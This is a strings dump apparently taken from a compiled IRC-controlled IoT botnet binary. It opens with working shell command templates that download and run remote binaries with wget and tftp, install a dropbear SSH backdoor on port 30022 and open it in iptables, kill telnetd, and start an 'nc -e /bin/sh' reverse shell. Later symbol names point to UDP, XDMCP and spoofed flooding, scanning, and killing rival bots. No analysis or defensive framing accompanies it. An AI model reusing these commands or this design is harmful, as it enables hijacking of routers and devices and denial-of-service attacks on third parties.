export fileGet=busybox-mips;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;cd /var;(([ ! -e /var/"$fileGet" ] || [ ! -s /var/"$fileGet" ]) && tftp -g -r "$fileGet" %s && chmod +x "$fileGet" && ./"$fileGet" mkdir bin && ./"$fileGet" --install -s /var/bin && ls -l "$fileGet" || echo It appears we already have /var/"$fileGet")
GETSSH 
export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;cd /tmp;export url=%s;name=`echo "$url" | sed 's#.*/##'` && wget -O "$name" "$url";chmod +x "$name";mv "$name" /var/bin;ls -l /var/bin/"$name" && dss=/var/dbs/dropbear_dss_host_key;rsa=/var/dbs/dropbear_rsa_host_key;ecd=/var/dbs/dropbear_ecdsa_host_key;cd /var/bin;for i in dropbear dbclient dropbearkey dropbearconvert;do ln -s /var/bin/dropbearmulti $i;done;[ ! -d /var/dbs ] && mkdir /var/dbs;[ -f $dss ] || dropbearkey -t dss -f $dss;[ -f $rsa ] || dropbearkey -t rsa -f $rsa;[ -f $ecd ] || dropbearkey -t ecdsa -f $ecd;dropbear -r $dss -r $rsa -r $ecd -p 30022;iptables -I INPUT 1 -p tcp --dport 30022 -j ACCEPT
INSTALL 
export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo "$url" | sed 's#.*/##'`;(([ ! -e /var/bin/$name ] || [ ! -s /var/bin/$name ]) && echo "$name either doesnt exist or eq 0 so we get" && cd /tmp && wget -O "$name" "$url" && chmod +x "$name" && mv "$name" /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo "It appears I already have $name")
BINUPDATE 
export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo "$url" | sed 's#.*/##'`;([ -e /var/bin/$name ]) && echo $name exists so we delete it... && rm /var/bin/$name && cd /tmp && wget -O $name $url && chmod +x $name && mv $name /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo "$name doesnt exist, perhaps you mean INSTALL?"
LOCKUP 
export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;export HOME=/tmp;[ ! -f /var/bin/dmips ] && cd /var/bin;wget -O dmips %s;chmod +x /var/bin/dmips;(killall -9 telnetd || kill -9 telnetd) && (nohup dmips || trap '' 1 2 /var/bin/dmips)
RSHELL 
export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;trap '' 1 2; sh -c 'nohup nc %s -e /bin/sh '&
SCAN 
export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;(([ ! -x /var/bin/scan ] || [ ! -x /var/bin/nmap ]) && echo "I am missing either scan or nmap, and Shellzrus was on Xanax when he wrote this, so you need to do INSTALL http:/\server/nmap and INSTALL http://server/scan first..." && ([ -f /var/bin/nmap ] && ls -l /var/bin/nmap) && ([ -f /var/bin/scan ] && ls -l /var/bin/scan) || scan %s)
BASH 
export HOME=/tmp;export SHELL=/var/bin/bash;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;%s
MODE %s -xi
JOIN %s :%s
WHO %s
PONG %s
NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
PRIVMSG
PING
/etc/rc.d/rc.local
/etc/rc.conf
"%s%s"
#Skid-api
NICK [%s|%s]%s
USER %s localhost localhost :%s
ERROR
0.9.30
%s%s%m
/bin/sh
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
0123456789abcdef
%u.%u.%u.%u.in-addr.arpa
%x.%x.
ip6.arpa
/dev/null
L(knN
 Ainf
clntudp_create: out of memory
bad auth_len gid %d str %d auth %d
xdr_string: out of memory
xdr_bytes: out of memory
/etc/services
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
__get_myaddress: socket
__get_myaddress: ioctl (get interface configuration)
Beeb
__get_myaddress: ioctl
Cannot register service
xdr_array: out of memory
/etc/hosts
/etc/config/hosts
RPC: (unknown error code)
%s: 
; errno = %s
; low version = %lu, high version = %lu
; why = 
(unknown authentication error - %d)
; s1 = %lu, s2 = %lu
Authentication OK
Invalid client credential
Server rejected credential
Invalid client verifier
Server rejected verifier
Client credential too weak
Invalid server verifier
Failed (unspecified error)
RPC: Success
RPC: Can't encode arguments
RPC: Can't decode result
RPC: Unable to send
RPC: Unable to receive
RPC: Timed out
RPC: Incompatible versions of RPC
RPC: Authentication error
RPC: Program unavailable
RPC: Program/version mismatch
RPC: Procedure unavailable
RPC: Server can't decode arguments
RPC: Remote system error
RPC: Unknown host
RPC: Unknown protocol
RPC: Port mapper failure
RPC: Program not registered
RPC: Failed (unspecified error)
CAk[S
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
Eleele
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
libc/sysdeps/linux/i386/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2429
p.2427
__do_global_dtors_aux
object.2482
frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/i386/crtn.S
libc/sysdeps/linux/i386/crt1.S
ggSkidVersion.c
textBuffer.5002
i.5612
i.5726
C.241.6678
C.453.8039
C.464.8163
C.463.8162
C.494.8475
printchar
prints
printi
print
ipState.8933
ipState
errno.c
thread_self
manager.c
terminated_children
main_thread_exiting
pthread_kill_all_threads
pthread_start_thread
pthread_start_thread_event
pthread_free
restart
pthread_reap_children
pthread_threads_counter
ptfork.c
pthread_insert_list
pthread_call_handlers
pthread_atfork_lock
pthread_atfork_prepare
pthread_atfork_child
pthread_atfork_parent
semaphore.c
enqueue
remove_from_queue
__pthread_set_own_extricate_if
new_sem_extricate_func
suspend
signals.c
pthread_null_sighandler
pthread_sighandler_rt
sighandler
pthread_sighandler
spinlock.c
wait_node_dequeue
__pthread_acquire
wait_node_free
wait_node_free_list_spinlock
wait_node_free_list
wrapsyscall.c
pthread.c
current_rtmin
current_rtmax
pthread_handle_sigdebug
current_level
pthread_onexit_process
pthread_initialize
pthread_handle_sigrestart
pthread_handle_sigcancel
__libc_multiple_threads_ptr
attr.c
cancel.c
condvar.c
cond_extricate_func
events.c
join.c
join_extricate_func
lockfile.c
mutex.c
__pthread_trylock
__pthread_alt_trylock
once_masterlock
once_finished
fork_generation
pthread_once_cancelhandler
ptlongjmp.c
pthread_cleanup_upto
specific.c
pthread_keys
pthread_keys_mutex
sigaction.c
__restore_rt
__restore
libc/sysdeps/linux/i386/clone.S
__error
libc/sysdeps/linux/i386/setjmp.S
libc/sysdeps/linux/i386/mmap.S
__syscall_fcntl.c
__syscall_fcntl64.c
__syscall_rt_sigaction.c
_exit.c
close.c
fork.c
fsync.c
getcwd.c
getdtablesize.c
geteuid.c
getpagesize.c
getpid.c
getppid.c
getrlimit.c
gettimeofday.c
ioctl.c
kill.c
llseek.c
longjmp.c
lseek.c
mkdir.c
msync.c
munmap.c
nanosleep.c
open.c
open64.c
pause.c
pipe.c
poll.c
pread_write.c
__fake_pread_write64
__fake_pread_write
read.c
sched_get_priority_max.c
sched_get_priority_min.c
sched_getparam.c
sched_getscheduler.c
sched_setscheduler.c
sched_yield.c
select.c
setrlimit.c
setsid.c
sigprocmask.c
sigsuspend.c
time.c
wait.c
wait4.c
waitpid.c
write.c
toupper.c
__C_ctype_toupper.c
fclose.c
fopen.c
perror.c
vsprintf.c
fprintf.c
snprintf.c
asprintf.c
sprintf.c
vasprintf.c
vsnprintf.c
popen.c
mylock
popen_list
_fopen.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.3991
_fixed_buffers
_wcommit.c
vfprintf.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4201
prefix.4202
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4203
qual_chars.4208
spec_chars.4204
spec_ranges.4205
spec_or_mask.4206
spec_and_mask.4207
feof.c
fgets.c
fputc.c
fputs.c
fflush_unlocked.c
fgets_unlocked.c
fputc_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strchr.c
strcpy.c
strlen.c
strncmp.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1161
_string_syserrmsgs.c
bcopy.c
strcasecmp.c
strcasestr.c
strdup.c
strtok.c
next_start.1109
isatty.c
tcdrain.c
tcgetattr.c
ntohl.c
getaddrinfo.c
gaih_inet_serv
gaih_inet
gaih_inet_typeproto
gaih
ntop.c
inet_pton4
xdigits.3116
inet_ntop4
in6_addr.c
inet_aton.c
inet_ntoa.c
buf.2658
inet_makeaddr.c
gethostbyname.c
buf.4993
h.4992
gethostbyname_r.c
gethostbyname2_r.c
gethostbyaddr_r.c
accept.c
bind.c
connect.c
getsockopt.c
listen.c
recv.c
recvfrom.c
recvmsg.c
send.c
sendmsg.c
sendto.c
setsockopt.c
socket.c
sigaddset.c
sigdelset.c
sigempty.c
sigfillset.c
sigismem.c
sigjmp.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
calloc.c
realloc.c
free.c
__malloc_trim
abort.c
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
system.c
atol.c
strtol.c
strtoul.c
_stdlib_strto_l.c
exit.c
on_exit.c
execl.c
sleep.c
sysconf.c
usleep.c
libc_pthread_init.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.2832
rpc_thread.c
rpc_thread_multi
__libc_tsd_RPC_VARS_mem
once.5746
__syscall_error.c
libc/sysdeps/linux/i386/__longjmp.S
libc/sysdeps/linux/i386/vfork.S
__socketcall.c
clock_getres.c
dup2.c
execve.c
getegid.c
getgid.c
getuid.c
mremap.c
sbrk.c
tolower.c
__C_ctype_b.c
__C_ctype_tolower.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
fdopen.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
fgetc_unlocked.c
memchr.c
memmove.c
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
clnt_simple.c
clnt_udp.c
clntudp_geterr
clntudp_freeres
clntudp_abort
clntudp_control
udp_ops
clntudp_destroy
clntudp_call
create_xid.c
is_initialized
__rpc_lrand48_data
pm_getport.c
timeout
tottimeout
pmap_prot.c
rpc_commondata.c
rpc_prot.c
reply_dscrm
svc.c
svc_find
svc_auth.c
svcauthsw
_svcauth_null
svc_authux.c
xdr.c
crud.3318
xdr_zero
xdr_mem.c
xdrmem_ops
xdrmem_destroy
xdrmem_getpos
xdrmem_setpos
xdrmem_inline
xdrmem_putint32
xdrmem_getint32
xdrmem_putlong
xdrmem_getlong
xdrmem_putbytes
xdrmem_getbytes
getservice.c
__initbuf
servbuf
servf
serv
serv_stayopen
if_index.c
decoded.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
get_hosts_byaddr_r.c
opensock.c
lrand48_r.c
nrand48_r.c
srand48_r.c
__exit_handler.c
dl-support.c
brk.c
cmsg_nxthdr.c
fseeko.c
rewind.c
printf.c
fseeko64.c
_READ.c
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
strcmp.c
strncat.c
memcmp.c
memcmp_bytes
rawmemchr.c
strspn.c
ffs.c
auth_none.c
authnone_verf
authnone_validate
authnone_refresh
authnone_destroy
authnone_marshal
authunix_prot.c
bindresvport.c
port.2347
pmap_clnt.c
__get_myaddress
rpc_dtablesize.c
size.3882
xdr_array.c
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
drand48-iter.c
clnt_perror.c
rpc_errlist
rpc_errstr
free_mem
_buf
auth_errlist
auth_errstr
encoded.c
lengthd.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__read_etc_hosts_r
longjmp
__libc_tcdrain
__linuxthreads_pthread_threads_max
__GI_pthread_attr_getdetachstate
in6addr_any
__GI_if_freenameindex
__GI_execve
unknown
__libc_sigaction
__libc_pread
strcpy
__GI_fcntl64
get_iface_ip
__GI_sigaddset
__socketcall
myStrCat
__GI___ctype_b
xdr_longlong_t
bcmp
__GI_memchr
gigatcp
__GI_pthread_attr_setdetachstate
dispass
__GI___glibc_strerror_r
pthread_mutex_timedlock
waitpid
__longjmp
__libc_fsync
__open_nameservers
xprt_register
__GI_fopen
getrlimit
pause
ioctl
pthread_cond_signal
_stdio_openlist_use_count
__pthread_mutexattr_destroy
if_indextoname
getservent
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_xdrmem_create
__GI_time
_352
getgid
popen
botkill
__pthread_exit_code
printf
sysconf
stdout
vsprintf
random
__GI_strdup
__GI_getpagesize
lrand48_r
getdtablesize
__GI_h_errno
contains_fail
Send
__length_question
__GI___ctype_toupper
hackpkg
setservent
__GI_strcasecmp
__pthread_restart_new
__GI_tolower
pthread_mutexattr_gettype
__GI_strncmp
putc_unlocked
pthread_attr_destroy
recv
connect
__linuxthreads_initial_report_events
__encode_question
svcerr_auth
__GI___uClibc_fini
numpids
__encode_header
getservbyname_r
pthread_attr_getstacksize
__GI_strncat
__pthread_once
ismaster
pthread_create
sigemptyset
__pthread_mutex_lock
pthread_getspecific
__new_sem_destroy
__sigdelset
setup_ldap_udp_header
identd
__GI_clock_getres
__GI_pthread_attr_init
__GI_svc_register
__GI_endservent
__pthread_find_self
__uClibc_fini
setup_raw_udp_ip_header
memrchr
geteuid
__rpc_thread_svc_cleanup
inet_pton
__GI_snprintf
__GI_vsnprintf
pthread_attr_init
__GI_pthread_setcanceltype
__GI_setsid
pthread_mutexattr_getkind_np
scanKuzePid
scanMiraiPid
__GI_sigsuspend
memmove
masters
pthread_exit
pclose
__bsd_signal
snprintf
sem_timedwait
__GI_strpbrk
pmap_set
__stdio_trans2r_o
__GI_setsockopt
munmap
__libc_stack_end
__pthread_manager_thread_bos
sched_getparam
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
setup_ldap_ip_header
_uintmaxtostr
_longjmp
__exit_function_table
__GI_xdr_pmap
pthread_condattr_setpshared
xdrmem_create
__libc_fcntl
atol
_h_errno
xdr_des_block
__new_sem_init
getRandomPublicIP
xdr_opaque_auth
getc_unlocked
clnt_spcreateerror
ident
servers
__ctype_b
__pthread_manager_event
__GI_random_r
__fresetlockfiles
clnt_perrno
pwrite64
__GI___longjmp
__pthread_mutexattr_settype
__GI_if_nameindex
errno
doScanner
sendTheVoltUDP
getegid
__GI_pthread_attr_getschedparam
read_until_response
__linuxthreads_create_event
snmp
__GI_clnt_sperror
__GI_sbrk
__libc_accept
__GI___uClibc_init
limiter
__GI_getservbyport_r
_create_xid
usleep
nick
version
__exit_handler
execve
__libc_current_sigrtmax
setup_ntp_header
__GI_pthread_condattr_destroy
__libc_pwrite64
pthread_condattr_init
getpagesize
getpid
pthread_attr_getstackaddr
xdr_u_hyper
__pthread_suspend
GasThemAll
setstate_r
__GI_lseek64
fgets
getHost
__libc_getpid
pthread_key_delete
__GI_pthread_attr_setschedparam
__xpg_strerror_r
__GI___rpc_thread_svc_fdset
_pthread_cleanup_pop
fcntl64
mfork
__pthread_lock
memcpy
rekdevice
__GI_svc_getreq
pthread_cancel
pmap_getport
__GI_fputs_unlocked
execl
reset_ipstate
__pthread_mutexattr_setpshared
__GI_fgets
__pthread_initial_thread_bos
svc_sendreply
perror
pthread_mutexattr_destroy
_rpc_dtablesize
__pthread_reset_main_thread
sendHTTP
creat
_stdio_openlist_dec_use
sclose
__libc_select
__pthread_do_exit
pthread_equal
_ppfs_init
__GI_memcmp
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
sock
dup2
__GI_fgets_unlocked
__pthread_mutex_init
__libc_current_sigrtmin
__pthread_sig_debug
sem_destroy
__GI__seterr_reply
tolower
getuid
__GI_xdr_string
system
__open_etc_hosts
feof
__rpc_thread_svc_max_pollfd
__GI_xprt_register
__pthread_cleanup_push_defer
malloc
isatty
spoof
__GI_pthread_cond_timedwait
siglongjmp
pthread_attr_getscope
get_ipstate_host
__GI_pmap_unset
actualparent
sleep
__GI_atol
sched_setscheduler
__new_sem_post
__pthread_initialize_manager
vsnprintf
__dns_lookup
rndnick
__GI_read
recvfrom
sem_wait
xdr_bytes
svcerr_decode
tcdrain
__C_ctype_tolower
pthread_attr_getguardsize
sendTheXDMCP
random_r
__libc_longjmp
strtoul
__dso_handle
sem_post
sched_getscheduler
__new_exitfn
clock_getres
pthread_testcancel
__pthread_manager_sighandler
__libc_pthread_init
gethostbyname_r
__pthread_attr_getstackaddr
__linuxthreads_death_event
__linuxthreads_version
xdmcpflood
__GI_pthread_attr_destroy
OLDHTTP
socket
__GI_dup2
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
__GI_accept
clnt_perror
__pthread_attr_setstacksize
pthread_attr_getinheritsched
__stdio_seek
__linuxthreads_pthread_keys_max
pthread_kill_other_threads_np
mempcpy
__GI_strcoll
__GI_write
__pthread_mutexattr_gettype
xdr_void
sem_unlink
__ctype_toupper
__libc_pwrite
__libc_read
xdr_pmap
svcerr_progvers
__GI_xdr_accepted_reply
_string_syserrmsgs
svcerr_noproc
HeilHitler
disabled
__pthread_kill_other_threads_np
__GI_open
__GI_strchr
__searchdomain
__pthread_initialize
getservent_r
__GI_xdr_rejected_reply
__pthread_mutexattr_setkind_np
lseek
__GI_clnt_perror
sigaddset
__linuxthreads_pthread_key_2ndlevel_size
__GI_tcgetattr
__environ
mmap
xdr_vector
__GI_clntudp_create
__pthread_alt_unlock
svc_getreq_common
wcsnrtombs
ChangetoDnsNameFormat
pthread_detach
makeIPPacket
__GI_inet_ntoa
send
svc_getreq
freeaddrinfo
__fgetc_unlocked
__GI_clnt_spcreateerror
abort
nrand48_r
xprt_unregister
getservbyport_r
pthread_attr_getschedpolicy
enable
getspoof
__sigjmp_save
__libc_drand48_data
__pthread_handles
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__libc_tsd_RPC_VARS_data
__GI_getgid
__GI_gethostbyaddr_r
srandom_r
__GI_fputs
xdr_char
_init
__GI_setrlimit
clnt_pcreateerror
__GI_inet_ntoa_r
__GI_setstate_r
pthread_attr_setstackaddr
strtol
__sigsetjmp
pipe
__libc_lseek64
__GI_pthread_getschedparam
_svcauth_unix
SendOldHTTP
strnlen
__GI_if_nametoindex
rawmemchr
__GI_mempcpy
accept
__libc_allocate_rtsig
setup_udp_header
__malloc_state
IPh_dst_ip
user
setup_xdmcp_ip_header
__GI_getservbyport
pthread_getschedparam
__GI___C_ctype_b_data
__libc_pread64
__GI_xdr_replymsg
execfile
__GI_lrand48_r
__sigaddset
Payload
__GI_xdr_authunix_parms
pthread_setcancelstate
xdr_union
__pthread_functions
nanosleep
__GI_send
__pthread_wait_for_restart_signal
xdr_enum
setup_gre_header
h_errno
calloc
__GI_svcerr_auth
server
xdr_bool
__pthread_mutex_unlock
wait4
__register_frame_info_bases
__GI_exit
__app_fini
setrlimit
csum
